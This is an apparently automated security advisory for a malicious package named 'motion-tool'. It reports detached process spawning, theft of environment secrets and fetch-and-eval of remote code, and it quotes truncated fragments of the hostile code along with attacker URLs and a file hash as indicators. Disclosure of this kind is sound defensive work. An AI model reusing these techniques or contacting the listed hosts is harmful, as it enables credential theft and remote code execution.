VDB
GCVE-110-OSM-2026-4786
GCVE-110-OSM-2026-4786
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code.
Entrypoint: index.js (main: index.js)
Payload: lib/initializeCaller.js
Key findings:
- Stealth Background Process Spawning in index.js: "spawn('node', [scriptPath, JSON.stringify(args)], {
detached: true,
stdi..."
- Environment Variable Exfiltration in lib/initializeCaller.js: "process.env.DEV_SECRET_VALUE);
let retryCount = 5;
while (retryCount > 0) ..."
- Global Variable Shadowing in lib/initializeCaller.js: "const process = {"
- Base64 Decoded Environment Variable in lib/initializeCaller.js: "atob(process.env."
- Fetch and Eval/Exec in lib/initializeCaller.js: "axios.get(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data.co..."
IOCs:
- urls: http://192.168.1.42:9200, https://purple-kelila-79.tiiny.site/data.json
- domains: purple-kelila-79.tiiny.site
- payloadFileHash: e5e2163fdafce48f59ac0fad8e8b98b5eaffa45e3978b18d442480b7758f6c6d
Decoded/deobfuscated IOCs:
- urls: https://purple-kelila-79.tiiny.site/data.json
- domains: purple-kelila-79.tiiny.site
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | motion-tool | all (affected) | — |
Aliases
Browse GCVE Records
73,443 records in the GCVE database · Updated July 18, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.